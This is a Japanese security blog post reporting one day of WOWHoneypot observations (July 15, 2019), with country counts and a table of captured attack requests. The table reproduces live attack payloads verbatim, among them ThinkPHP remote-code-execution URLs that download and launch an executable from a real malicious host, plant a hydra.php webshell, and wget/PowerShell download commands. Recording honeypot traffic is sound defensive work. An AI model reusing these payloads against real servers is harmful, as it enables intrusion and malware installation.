23log

WOWHoneypotで観測した日々のログをつらつらと

トップ > Honeypot > WOWHoneypot観察(121日目)

WOWHoneypot観察(121日目)

Honeypot

2019/07/15(月)

トータルは69件でした。

ハンティングログは以下です。

14.55.204.70 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com
www.virustotal.com

27.49.81.240 powershell (new-object System.Net.WebClient).DownloadFile('hxxp[:]//fid[.]hognoob[.]se/download.exe
27.49.81.240 powershell (new-object System.Net.WebClient).DownloadFile('hxxp[:]//fid[.]hognoob[.]se/download.exe
27.49.81.240 powershell (new-object System.Net.WebClient).DownloadFile('hxxp[:]//fid[.]hognoob[.]se/download.exe
27.49.81.240 powershell (new-object System.Net.WebClient).DownloadFile('hxxp[:]//fid[.]hognoob[.]se/download.exe

www.virustotal.com
www.virustotal.com


IPのロケーション別の件数は以下です。

アメリ 20
中国 15
イラン 5
ブラジル 5
インド 5
オランダ 2
ギリシャ 2
エストニア 2
韓国 2
セルビア 2
ポーランド 2
スロバキア 1
メキシコ 1
スイス 1
インドネシア 1
クライナ 1
ウガンダ 1
アフガニスタン 1

f:id:sec23:20190716004318p:plain

件数 概要 リクエス
42 アクセス GET /
7 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
2 不正中継の調査 GET hxxp[:]//110.249.212.46/testget?q=23333&port=80
1 SpringDataCommonsの脆弱性を狙った通信 POST /users?page=&size=5
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 不正中継の調査 GET http://www.ceek.jp/?0.13653232913839023407918576
1 不正中継の調査 GET http://www.baidu.com/?0.205112371705731381995028
1 不明 GET /script
1 ThinkPHPの脆弱性を狙った通信 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/qitsitfooyheusi29167.exe');start%20%SystemRoot%/Temp/qitsitfooyheusi29167.exe
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php
1 ThinkPHPの脆弱性を狙った通信 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/qitsitfooyheusi29167.exe');start%20%SystemRoot%/Temp/qitsitfooyheusi29167.exe
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Nmapによる調査 POST /sdk
1 Nmapによる調査 HEAD /
1 Nmapによる調査 GET /nmaplowercheck1563182398
1 Nmapによる調査 GET /evox/about
1 Nmapによる調査 GET /NmapUpperCheck1563182398
1 Nmapによる調査 GET /Nmap/folder/check1563182398
1 Nmapによる調査 GET /HNAP1